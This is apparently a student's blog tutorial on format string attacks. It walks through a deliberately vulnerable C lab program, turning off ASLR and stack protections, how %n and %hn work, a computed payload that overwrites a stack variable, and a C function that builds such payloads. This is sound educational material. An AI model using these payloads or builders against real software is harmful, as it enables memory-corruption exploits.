A brief background
Having been a software developer, one of my main interests in cybersecurity is software security. In my post-graduate studies, the earliest attacks on software memory bugs introduced to me were buffer overflow (of course) and the format string attack.
Buffer overflow is fairly easy to understand. It was the format string attack that made me pull my hair out. My understanding of format strings was as horrible as my half-baked French! Je ne comprends pas!!! Unfortunately, one of my recent assignments required me to use a format string attack to open a shell. I was determined to do well in my assignments, so I decided to improve my understanding of the format string attack. I learnt a lot in the process and I want to share that learning process here. Let's hope this benefits you if you have any issues with format string attacks, particularly in your assignments.
First of all, I do not want to go through the basics of the format string attack again. They have been sufficiently explained in various papers and websites. But to get everyone started, these are the main references that I used in my learning (and recent assignment).
References:
Reference 1: Format String Exploitation-Tutorial by Saif El-Sherei
I believe this is one of the most referenced materials online when it comes to format string attacks. It is simple enough to understand.
Reference 2: Exploit 101 - Format Strings by Alexandre CHERON
This article really helped me understand how to use %n and %hn, which were the main stumbling blocks in my understanding of the format string attack. While the examples in reference 1 were more relevant to my assignments, it was this article that gave me the knowledge to understand what was going on.
The big deal?
As I mentioned above, %n and %hn were confusing to me. I knew the basics of how format string attacks work. The vulnerability appears when user input is passed straight in as the format string (as in printf(buffer)), so the format specifiers inside it have no matching arguments. Without those arguments, printf, snprintf and friends just keep reading off the stack like nobody's business. A big no-no if you hold important information on the stack. Remember, local variables live on the stack. So even if you are only storing, say, a password in a local variable temporarily, it can still be read by a format string attack.
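To make the difference concrete, here is a minimal sketch of the safe pattern. The helper name format_safely is my own invention for illustration and is not taken from either reference. The only format string the library ever sees is the literal "%s", so specifiers typed by the user are treated as plain text.

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper: copies user text into out without ever
 * interpreting it as a format string. The literal "%s" is the only
 * format string snprintf sees; user_input is treated as plain data.
 * Returns whatever snprintf returns (the length of the text). */
int format_safely(char *out, size_t out_size, const char *user_input)
{
    return snprintf(out, out_size, "%s", user_input);
}

/* The vulnerable counterpart, left as a comment on purpose:
 *     snprintf(out, out_size, user_input);
 * Here a "%x" or "%n" inside user_input would be acted upon. */
```

Calling format_safely with an input such as "%x %x %n" simply copies those eight characters into the output, which is what printf("%s", buffer) would do in the vulnerable program further down.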
Ok, let us start looking at the examples. Note that all my examples are performed on Kali Linux. (Note: I learn best with examples and following them)
The code
So let's look at this code from my reference 2:
Code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
    int target = 0xdeadc0de;
    char buffer[64];
    fgets(buffer, 64, stdin);
    printf(buffer); /* user input used as the format string: the bug */
    if(target == 0xcafebabe) {
        printf("Good job !\n");
        return EXIT_SUCCESS;
    } else {
        printf("Nope...\n");
        exit(EXIT_FAILURE);
    }
}
The setup
First of all, let us disable ASLR.
sudo su
echo 0 > /proc/sys/kernel/randomize_va_space
I am also using GEF. Pretty nifty tool for GDB, to be honest. Of course we have PEDA, but what's the point of writing this if I am doing the same thing as Mr Cheron? In case you wonder, I set the number of stack lines in GEF to 100 and set the stack to display downwards. This is more in line with what I was taught in class, where the stack grows downward.
gef config context.nb_lines_stack 100
gef config context.grow_stack_down true
gef save
The code is compiled using gcc:
gcc -z execstack -z norelro -fno-stack-protector -o format1 format1.c -m32 -g
After setting a breakpoint at main and stepping to line 13:
On my Kali machine, target (0xdeadc0de) is located at 0xffffcfcc. Basically, the exercise requires me to overwrite that value with 0xcafebabe.
The Stack (in my own words)
On most systems (at least I know Linux does this), the stack grows downwards. In this simple picture, each new local variable is stored at the next lower address, although the compiler is free to reorder or pad things. For example, if target is stored at 0xffff0048, then buffer will be at 0xffff0048 - 0x40 = 0xffff0008.
From my screenshots, we know that target is located at 0xffffcfcc. Since buffer is 64 bytes (0x40), it should reside at 0xffffcf8c. This is probably not significant here, but it is good to know and it helps me understand the stack better.
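The subtraction above can be written as a tiny sketch. The helper name addr_directly_below is made up for illustration, and it assumes the buffer sits immediately below the other variable with no padding, which the compiler does not guarantee.

```c
#include <stdint.h>
#include <stddef.h>

/* Hypothetical helper: where a buffer of buffer_size bytes would start
 * if it sat directly below a variable located at upper_addr.
 * Assumes no padding or reordering by the compiler. */
uint32_t addr_directly_below(uint32_t upper_addr, size_t buffer_size)
{
    return upper_addr - (uint32_t)buffer_size;
}
```

With the numbers from my machine, addr_directly_below(0xffffcfcc, 64) gives 0xffffcf8c. It is worth confirming the real address in GDB rather than trusting the arithmetic alone.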
%n and its siblings
After reading many references and articles, I finally understood what %n does:
Like %x, %s or %p, %n consumes the argument at its position. Instead of printing anything, it writes the number of characters printed so far into the int that the argument points to. In the illustration above, that count x is written into i.
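So what if we have multiple %n? The illustration below should tell the story better, based on the explanation above.
But what if we do not specify the arguments? The behaviour is the same as for %x: printf takes whatever value sits next on the stack, except that %n treats that value as an address and writes to it.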
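Here is a small, well-behaved sketch of %n with proper arguments, so the counting is easy to see. The function count_with_n and its parameter names are hypothetical, chosen only for this illustration. The format string is a literal, so nothing here is exploitable.

```c
#include <stdio.h>

/* Hypothetical demo: formats two words and uses %n twice to record
 * how many characters had been produced at each point.
 * Keep the two words short enough to fit in the 256-byte buffer. */
void count_with_n(const char *first, const char *second,
                  int *after_first, int *after_second)
{
    char out[256];
    snprintf(out, sizeof out, "%s%n%s%n",
             first, after_first, second, after_second);
}
```

Calling it with "hello" and "world" stores 5 through the first pointer and 10 through the second, because each %n records the running total and not the length of the last piece. In the attack, the same mechanism is used, except that the pointers come from the stack instead of from real arguments.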
One issue is that %n writes a full 4-byte integer to the address. That means if I want to write 0xcafebabe into target, printf would first have to output 0xcafebabe (about 3.4 billion) characters. Instead of %n, we can use %hn and %hhn, which write 2 bytes and 1 byte respectively. If I use %hn, I need to specify 2 addresses instead of 1.
Translating this to my example, the addresses are 0xffffcfcc and 0xffffcfce.
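The split into two half-writes can be sketched as below. The struct half_write and the function split_into_halves are names I made up for illustration. The sketch assumes a little-endian target such as 32-bit x86, where the low 16 bits live at the lower address.

```c
#include <stdint.h>

/* One 16-bit write: the address to hit and the value %hn must store. */
struct half_write {
    uint32_t addr;
    uint16_t value;
};

/* Hypothetical helper: split one 32-bit write into two 16-bit writes.
 * Assumes a little-endian target, so the low half goes to addr and
 * the high half goes to addr + 2. */
void split_into_halves(uint32_t addr, uint32_t value,
                       struct half_write out[2])
{
    out[0].addr  = addr;
    out[0].value = (uint16_t)(value & 0xffffu);
    out[1].addr  = addr + 2;
    out[1].value = (uint16_t)(value >> 16);
}
```

For target at 0xffffcfcc and the value 0xcafebabe, this yields 0xbabe for 0xffffcfcc and 0xcafe for 0xffffcfce.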
The format string
So my final format string will be something like:
<address1><address1 + 2 bytes><X bytes to make it to 0xbabe>%7$hn<Y bytes to make it to 0xcafe>%8$hn
address1 = \xcc\xcf\xff\xff
address2 = \xce\xcf\xff\xff
X = 0xbabe - 8 = 47798 (the two addresses already account for 8 characters)
Y = 0xcafe - 0xbabe = 4160
The full format string will be
"\xcc\xcf\xff\xff\xce\xcf\xff\xff%47798x%7$hn%4160x%8$hn"
Note: address1 and address2 will be different depending on your setup.
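Since the addresses change from setup to setup, it can help to compute the string instead of typing it by hand. Below is a rough sketch under a few assumptions: the names put_le32 and build_payload are hypothetical, the writes use %hn as discussed in the previous section, the argument position (7 on my machine) is passed in as first_arg, and the low half of the value must be smaller than the high half, which holds for 0xcafebabe.

```c
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

/* Store a 32-bit address in little-endian byte order. */
static void put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = (unsigned char)(v & 0xffu);
    dst[1] = (unsigned char)((v >> 8) & 0xffu);
    dst[2] = (unsigned char)((v >> 16) & 0xffu);
    dst[3] = (unsigned char)((v >> 24) & 0xffu);
}

/* Hypothetical helper: build <addr><addr+2>%Xx%N$hn%Yx%(N+1)$hn.
 * first_arg is the positional index of the first address.
 * Returns the payload length, or -1 if it cannot be built this way. */
int build_payload(unsigned char *out, size_t out_size,
                  uint32_t addr, uint32_t value, int first_arg)
{
    unsigned low  = value & 0xffffu;
    unsigned high = value >> 16;

    /* Each padding must be at least 8 so that "%Nx" prints exactly N
     * characters for any 32-bit value, and the counts must only grow. */
    if (out_size < 9 || low < 16 || high < low + 8)
        return -1;

    put_le32(out, addr);         /* receives the low half  */
    put_le32(out + 4, addr + 2); /* receives the high half */

    /* 8 characters (the two addresses) are already counted. */
    int n = snprintf((char *)out + 8, out_size - 8,
                     "%%%ux%%%d$hn%%%ux%%%d$hn",
                     low - 8, first_arg, high - low, first_arg + 1);
    if (n < 0 || (size_t)n >= out_size - 8)
        return -1;
    return 8 + n;
}
```

With addr = 0xffffcfcc, value = 0xcafebabe and first_arg = 7, the text part after the eight address bytes comes out as %47798x%7$hn%4160x%8$hn, for a total of 31 bytes, which fits within the 63 characters that fgets reads into buffer.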
Final thoughts
This is my first tech blog in over 15 years. I am glad that I managed to get something written. Obviously this is not finished, as I will go in depth on what I was asked to do for my assignment. The above serves as my "weapons" for the upcoming task.
Thank you for being a good audience and reaching this point. Do feel free to leave your comments. _Au revoir~ À bientôt!_